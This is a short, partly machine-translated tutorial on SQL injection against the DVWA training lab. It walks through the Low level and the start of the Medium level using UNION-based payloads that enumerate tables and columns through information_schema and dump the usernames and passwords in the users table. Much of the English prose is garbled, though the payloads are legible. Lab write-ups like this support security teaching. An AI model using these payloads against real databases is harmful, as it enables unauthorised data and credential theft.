DVWA-SQL injection
A, SQL injection concept
SQL injection refers to the attacker by injecting malicious SQL commands, SQL queries destroy the structure, so as to achieve the purpose to execute malicious SQL statements.
Second, the manual injection of conventional thinking
1 determines whether there is injection
2. Guess the number of fields in the query solution SSQL
3. Determine the echo location
4. Get the current database
The acquisition table in the current database
6. Get the number of fields in the table
7. Data obtained
Three, DVWA injection analysis
The DVWA level to LOW
1. Analyze source code, you can see that does not do any filtering parameters directly into the database query, analysis sql query, there may be a character sql injection.
2. aql determines whether the injection, the presence and the type of injection. 1 'and' 1 '=' 1
3. SQL query guess the number of words in the paragraph statement,
1‘ order by 1#
1‘ order by 2#
1‘ order by 3#
From the above description may view the table number field SQL statement is a query (query echo position after the SQL statement) 2. Determine the position of the echo
1 'the union select 1,2 # # can be seen there were two back
Query the database and the current version, 1 'union select version (), database () #
Access to the database tables, 1 'union select 1, group_concat (table_name) from information_schema.tables where table_schema = database () #
Get the name of the field in the table, 1 'union select 1, group_concat (column_name) from information_schema.columns where table_name =' users' #
The data obtained in the field, 1 'union select user, password from users #
Intermediate DVWA get in! ! ! ! Do not look at the following
The level is set to Medium DVWA
中级加入了让一些防御,不让用户输入,只供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用masql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。
通过burpsuit抓包,修改数据包,绕过防御。判断注入点以及注入类型,下图可以看到,存在注入,注入类型是数字型注入。 1 and 1=1#